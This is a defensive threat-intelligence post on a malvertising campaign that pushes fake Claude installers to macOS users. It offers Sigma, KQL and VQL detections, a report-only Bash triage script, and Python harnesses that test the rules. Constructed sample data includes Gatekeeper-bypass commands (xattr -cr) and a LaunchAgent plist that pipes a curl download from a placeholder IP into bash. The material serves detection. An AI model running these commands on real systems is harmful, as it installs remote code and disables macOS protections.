
Malvertising Campaign Targets macOS via Google Ads for Claude.ai Downloads — Detection and Mitigation

Security Arsenal Team
May 10, 2026
5 min read

A malvertising campaign is actively targeting macOS users by trading on the popularity of AI tools. Attackers buy Google Ads for keywords such as "Claude mac download" to lure users into downloading malicious software. The sponsored result displays claude.ai as its destination, but clicking it sends the browser through redirects to fraudulent sites hosting the malicious payload.

For security practitioners this is a high-risk delivery vector that borrows the trust of two brands (Google and Anthropic) to defeat user skepticism. The payload is macOS malware, which can lead to credential and session theft, persistent access, or data exfiltration. Defenders should block the delivery chain (ad redirects and payload hosts) now and hunt for post-exploitation activity on endpoints.

Technical Analysis

  • Affected Platform: macOS (Intel and Apple Silicon).
  • Attack Vector: Malvertising (Search Engine Poisoning) and Social Engineering.
  • Attack Chain:
    1. Lure: User searches for "Claude mac download" on Google.
    2. Initial Access: User clicks a sponsored ad that displays the official claude.ai domain as its destination.
    3. Redirection: The ad sends the browser to a malicious landing page, often dressed with legitimate-looking content or abusing claude.ai shared chat links to host the "installation" instructions.
    4. Payload Delivery: User downloads a disk image (.dmg) or archive (.zip) posing as the Claude installer.
    5. Execution: User mounts the image and runs the malicious application, frequently after following the lure's instructions to bypass Gatekeeper (for example by removing the quarantine attribute).
    6. Impact: Installation of macOS malware (e.g., Atomic Stealer or similar info-stealers).
  • Exploitation Status: Active in the wild; the campaign was reported by BleepingComputer.

Detection & Response

The following detection logic focuses on behaviours typical of macOS malware delivered this way: scripted download and mounting of disk images, removal of the Gatekeeper quarantine attribute with xattr, and ad-hoc code signing of binaries with codesign.

SIGMA Rules

YAML
---
title: Potential macOS Gatekeeper Bypass via Quarantine Attribute Removal
id: 8d1f9a23-4c2e-4f3a-9b5d-6e7f8a9b0c1d
status: experimental
description: Detects xattr deleting the 'com.apple.quarantine' extended attribute (-d) or clearing all extended attributes (-c, commonly -cr on an .app bundle). Lure pages instruct users to run this so that Gatekeeper never assesses the downloaded application.
references:
 - https://attack.mitre.org/techniques/T1553/001/
author: Security Arsenal
date: 2025/04/09
tags:
 - attack.defense_evasion
 - attack.t1553.001
logsource:
  category: process_creation
  product: macos
detection:
  selection_img:
    Image|endswith: '/xattr'
  selection_delete:
    CommandLine|contains|all:
      - ' -d'
      - 'com.apple.quarantine'
  selection_clear:
    CommandLine|contains:
      - ' -c'
      - ' -rc'
  condition: selection_img and (selection_delete or selection_clear)
falsepositives:
  - Users or admins clearing quarantine on unsigned internal tools
  - Developer and packaging tooling that strips quarantine from build artifacts
level: high
---
title: Suspicious macOS Disk Image Download or Mount
id: 2e4f6b78-9a1d-4e5c-8f3b-1d2e3f4a5b6c
status: experimental
description: Detects scripted retrieval of a .dmg with curl or wget, and disk images being mounted with hdiutil attach. A single process_creation rule cannot sequence the two events; the selections fire independently and should be correlated by host and user in the SIEM, where a download followed within minutes by a mount is the pattern seen in malvertising campaigns.
references:
 - https://attack.mitre.org/techniques/T1105/
author: Security Arsenal
date: 2025/04/09
tags:
  - attack.command_and_control
  - attack.t1105
logsource:
  category: process_creation
  product: macos
detection:
  selector_download:
    Image|endswith:
      - '/curl'
      - '/wget'
    CommandLine|contains: '.dmg'
  selector_mount:
    Image|endswith: '/hdiutil'
    CommandLine|contains: 'attach'
  condition: selector_download or selector_mount
falsepositives:
  - Homebrew cask installs and other package managers that fetch and mount disk images
  - Legitimate software updates or downloads by admins
level: medium
---
title: Ad-Hoc Code Signing via codesign
id: 7c3d1e45-2b8f-4a9e-8c7d-1e2f3a4b5c6d
status: experimental
description: Detects codesign being run with the ad-hoc identity '-' (codesign -s - or --sign -), which produces a signature bound to no developer certificate. Repackaged payloads are often ad-hoc signed so that they still launch on Apple Silicon, which refuses entirely unsigned arm64 code. Whether an already-running binary is ad-hoc signed is a property of the file, not of a process-creation event; verify that with codesign -dv against the file.
references:
 - https://attack.mitre.org/techniques/T1553/002/
author: Security Arsenal
date: 2025/04/09
tags:
  - attack.defense_evasion
  - attack.t1553.002
logsource:
  category: process_creation
  product: macos
detection:
  selection_img:
    Image|endswith: '/codesign'
  selection_adhoc:
    CommandLine|re: '\s(-s|--sign)\s+-(\s|$)'
  condition: selection_img and selection_adhoc
falsepositives:
  - Developers ad-hoc signing local test builds
  - CI pipelines that ad-hoc sign intermediate builds
level: low
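Before deploying the three rules it helps to run their logic over concrete events and confirm what fires and what does not. The Python below is an added example written for this page, not code from the original post or from any vendor: the process events are constructed (the user name, paths and the example.invalid host are invented), and the functions reimplement the selections above directly rather than parsing Sigma. Benign look-alikes (xattr -l, xattr -p, a .pkg download, codesign -dv) are included to show the rules stay quiet on them.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    image: str         # full path of the executed binary (Sigma: Image)
    command_line: str  # command line as logged (Sigma: CommandLine)


# Constructed sample process-creation events, not real telemetry. The first
# five mirror behaviours the rules target; the others are benign look-alikes.
SAMPLE_EVENTS = [
    ProcessEvent("/usr/bin/xattr", "xattr -d com.apple.quarantine /Users/alice/Downloads/Claude.app"),
    ProcessEvent("/usr/bin/xattr", "xattr -cr /Users/alice/Downloads/Claude.app"),
    ProcessEvent("/usr/bin/hdiutil", "hdiutil attach -nobrowse /Users/alice/Downloads/Claude-Installer.dmg"),
    ProcessEvent("/usr/bin/codesign", "codesign --force --deep -s - /private/tmp/Claude.app"),
    ProcessEvent("/usr/bin/curl", "curl -fsSLo /tmp/Claude.dmg https://example.invalid/Claude.dmg"),
    ProcessEvent("/usr/bin/xattr", "xattr -l /Users/alice/Downloads/Claude.app"),
    ProcessEvent("/usr/bin/xattr", "xattr -p com.apple.quarantine /Users/alice/Downloads/Claude.app"),
    ProcessEvent("/usr/bin/curl", "curl -fsSLo /tmp/update.pkg https://example.invalid/update.pkg"),
    ProcessEvent("/usr/bin/codesign", "codesign -dv --verbose=4 /Applications/Claude.app"),
]


def _basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]


def _has_short_flag(command_line: str, letter: str) -> bool:
    """True if a single-dash option cluster (-d, -cr, -rc, ...) contains `letter`."""
    return re.search(rf"(?:^|\s)-[a-zA-Z]*{letter}[a-zA-Z]*(?=\s|$)", command_line) is not None


def quarantine_removal(ev: ProcessEvent) -> bool:
    """Gatekeeper bypass: xattr deleting (-d) the quarantine attribute or clearing all (-c)."""
    if _basename(ev.image) != "xattr":
        return False
    cl = ev.command_line
    return (_has_short_flag(cl, "d") and "com.apple.quarantine" in cl) or _has_short_flag(cl, "c")


def dmg_download_or_mount(ev: ProcessEvent) -> bool:
    """Scripted .dmg retrieval with curl/wget, or hdiutil attach of any image."""
    name = _basename(ev.image)
    if name in ("curl", "wget"):
        return ".dmg" in ev.command_line.lower()
    return name == "hdiutil" and "attach" in ev.command_line.split()


def adhoc_signing(ev: ProcessEvent) -> bool:
    """codesign invoked with the ad-hoc identity '-' (-s - or --sign -)."""
    if _basename(ev.image) != "codesign":
        return False
    return re.search(r"(?:\s-s|\s--sign)\s+-(?=\s|$)", ev.command_line) is not None


RULES = {
    "quarantine_removal": quarantine_removal,
    "dmg_download_or_mount": dmg_download_or_mount,
    "adhoc_signing": adhoc_signing,
}


def evaluate(events):
    """Map each rule name to the command lines it fires on."""
    return {name: [ev.command_line for ev in events if rule(ev)] for name, rule in RULES.items()}


if __name__ == "__main__":
    for name, hits in evaluate(SAMPLE_EVENTS).items():
        print(f"{name}: {len(hits)} hit(s)")
        for cl in hits:
            print("   ", cl)
```

The short-flag helper is the part worth copying into real rules: matching the literal string "-d" or "-c" anywhere in a command line is noisy, whereas anchoring on an option cluster that begins with a single dash keeps `xattr -l` and `xattr -p` (which only read the attribute) out of the high-severity alert.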

KQL (Microsoft Sentinel / Defender)

KQL — Microsoft Sentinel / Defender
// Hunt for xattr usage indicating Gatekeeper (quarantine) bypass on macOS endpoints.
// DeviceProcessEvents has no OSPlatform column, so the platform filter comes from DeviceInfo;
// the process name is in FileName and the image path in FolderPath.
DeviceProcessEvents
| where Timestamp > ago(7d)
| join kind=inner (DeviceInfo | where OSPlatform =~ "macOS" | distinct DeviceId) on DeviceId
| where FileName =~ "xattr"
// -d with the attribute named, or any option cluster containing -c (clear all attributes)
| where (ProcessCommandLine contains "com.apple.quarantine" and ProcessCommandLine matches regex @"\s-[a-zA-Z]*d[a-zA-Z]*(\s|$)")
    or ProcessCommandLine matches regex @"\s-[a-zA-Z]*c[a-zA-Z]*(\s|$)"
| project Timestamp, DeviceName, AccountName, FolderPath, ProcessCommandLine,
          InitiatingProcessFileName, InitiatingProcessCommandLine

Velociraptor VQL

VQL — Velociraptor
-- Hunt for .dmg files written to user Downloads folders in the last 7 days
SELECT OSPath, Size, Mtime, Mode
FROM glob(globs='/Users/*/Downloads/*.dmg')
WHERE Mtime > timestamp(epoch=now() - 7 * 86400)

-- Hunt for running processes whose executable lives in Downloads, the per-user
-- temp tree or a mounted disk image, and pull their code-signing details.
-- pslist() does not report signature status, so codesign is queried per process;
-- an ad-hoc signed binary shows 'Signature=adhoc' in the returned output.
SELECT Pid, Name, Exe, CommandLine,
       { SELECT Stderr FROM execve(argv=["/usr/bin/codesign", "-dv", Exe]) } AS SigningInfo
FROM pslist()
WHERE Exe =~ "/Downloads/|/private/var/folders/|/Volumes/"

Remediation Script (Bash)

Bash / Shell
#!/bin/bash
# Identify potential macOS malware artifacts from the Claude.ai malvertising campaign.
# Run with root privileges so every user's home directory is readable.
# The script only reports; nothing is deleted or killed without manual review.

echo "[*] Checking for recently modified .dmg files in Downloads..."
find /Users/*/Downloads -name "*.dmg" -mtime -7 -ls 2>/dev/null

echo "[*] Checking for app bundles in Downloads missing the quarantine attribute..."
# A freshly downloaded app normally carries com.apple.quarantine; its absence
# suggests the user ran xattr -d / -cr as instructed by a lure page.
find /Users/*/Downloads -maxdepth 2 -name "*.app" -mtime -7 2>/dev/null | while read -r app; do
  xattr -p com.apple.quarantine "$app" >/dev/null 2>&1 || echo "    NO QUARANTINE: $app"
done

echo "[*] Checking for currently mounted disk images..."
hdiutil info 2>/dev/null | grep -E "image-path|/Volumes/"

echo "[*] Checking for LaunchAgents in user profiles..."
# Look for recently created LaunchAgents (common persistence)
find /Users/*/Library/LaunchAgents -name "*.plist" -mtime -7 -exec ls -la {} \; 2>/dev/null

echo "[*] Checking for processes running from Downloads, temp or mounted images..."
# Note: killing processes requires caution. Investigate first.
# On macOS, ps 'comm' is the full executable path.
ps -axo pid,user,comm | grep -Ei "/Downloads/|/private/var/folders/|/Volumes/"

echo "[*] Remediation instructions:"
echo "1. Review the .dmg files listed above. If unknown, delete them and eject any mounted volume."
echo "2. Investigate LaunchAgents. Verify the binary path in the 'ProgramArguments' (or 'Program') key."
echo "3. If a malicious plist is found, unload it with launchctl, remove the file, and kill the associated process."
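The script above leaves LaunchAgent review to the analyst. The Python below is an added example, not code from the original post, that automates the first pass: it parses LaunchAgent plists, resolves the executable from either Program or ProgramArguments, and flags user-writable or hidden program paths, interpreters launched with an inline script, download commands, and the RunAtLoad/KeepAlive keys that make an agent start at every login and survive being killed. The three sample plists, their labels and the 203.0.113.10 address are constructed for the demonstration and are not artifacts from the campaign.

```python
import plistlib
import re
from typing import Any

# Constructed sample LaunchAgent plists; none is an artifact from the campaign.
SAMPLE_PLISTS: dict[str, bytes] = {
    "com.example.hidden-agent.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.hidden-agent</string>
  <key>ProgramArguments</key><array>
    <string>/Users/alice/Library/Application Support/.cache/agent</string>
    <string>--silent</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>""",
    "com.example.loader.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.loader</string>
  <key>ProgramArguments</key><array>
    <string>/bin/bash</string>
    <string>-c</string>
    <string>curl -fsSL http://203.0.113.10/s.sh | bash</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
    "com.vendor.helper.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.vendor.helper</string>
  <key>Program</key><string>/Applications/VendorApp.app/Contents/MacOS/helper</string>
  <key>StartInterval</key><integer>3600</integer>
</dict></plist>""",
}

# Locations a legitimate vendor agent rarely executes from, plus hidden directories.
SUSPICIOUS_PATH_RE = re.compile(
    r"^/(?:tmp|private/tmp|private/var/folders|Users/Shared|Volumes)/|/Downloads/|/\.[^/]+/"
)
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python", "python3", "perl"}
INLINE_SCRIPT_FLAGS = {"-c", "-e"}


def program_of(plist: dict[str, Any]) -> tuple[str, list[str]]:
    """Return (executable path, argv) from either the Program or ProgramArguments key."""
    args = [str(a) for a in plist.get("ProgramArguments", [])]
    program = str(plist.get("Program") or (args[0] if args else ""))
    return program, args


def triage_launch_agent(raw: bytes) -> list[str]:
    """Return reasons a LaunchAgent plist deserves review; an empty list means nothing notable."""
    plist = plistlib.loads(raw)
    program, args = program_of(plist)
    reasons: list[str] = []
    if SUSPICIOUS_PATH_RE.search(program):
        reasons.append(f"program in user-writable or hidden location: {program}")
    if program.rsplit("/", 1)[-1] in INTERPRETERS and any(a in INLINE_SCRIPT_FLAGS for a in args[1:]):
        reasons.append(f"interpreter with inline script: {' '.join(args)}")
    if re.search(r"\b(?:curl|wget)\b.*https?://", " ".join(args)):
        reasons.append("downloads content at launch")
    # Persistence modifiers only matter once something else looks off.
    if reasons and plist.get("RunAtLoad"):
        reasons.append("RunAtLoad set: executes at every login")
    if reasons and plist.get("KeepAlive"):
        reasons.append("KeepAlive set: relaunched if killed")
    return reasons


def triage_all(plists: dict[str, bytes]) -> dict[str, list[str]]:
    return {name: triage_launch_agent(data) for name, data in plists.items()}


if __name__ == "__main__":
    import glob
    import sys

    # With no arguments run on the constructed samples; on a real host pass plist
    # paths or let it glob every user's LaunchAgents directory (requires root).
    paths = sys.argv[1:] or glob.glob("/Users/*/Library/LaunchAgents/*.plist")
    inputs = {p: open(p, "rb").read() for p in paths} if paths else SAMPLE_PLISTS
    for name, reasons in triage_all(inputs).items():
        print(f"{name}: {'REVIEW' if reasons else 'ok'}")
        for r in reasons:
            print("   -", r)
```

The path heuristic is the one most worth tuning per environment: some legitimate agents do run from ~/Library/Application Support, so the regex only flags hidden directory components there, while anything under Downloads, the temp trees or a mounted volume is flagged outright.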

Remediation

  1. User Awareness & Blocking: Immediately notify security teams and end-users about the fake "Claude mac download" ads. Advise users to type claude.ai or anthropic.com directly into the address bar rather than relying on sponsored search results for downloads.
  2. Network Filtering: Update Secure Web Gateways (SWG) and DNS filters to block the malicious domains associated with this campaign. Take the indicators from the specific incident IOCs.
  3. Endpoint Hardening: Ensure Gatekeeper is enforced and cannot be disabled by users, for example through an MDM configuration profile carrying the com.apple.systempolicy.control payload with EnableAssessment set to true; verify on a host with spctl --status.
  4. Investigation: Use the provided Sigma, KQL and VQL logic to hunt for quarantine attribute removal, recent .dmg downloads and mounts, and ad-hoc signing activity in your environment over the last 7 days.
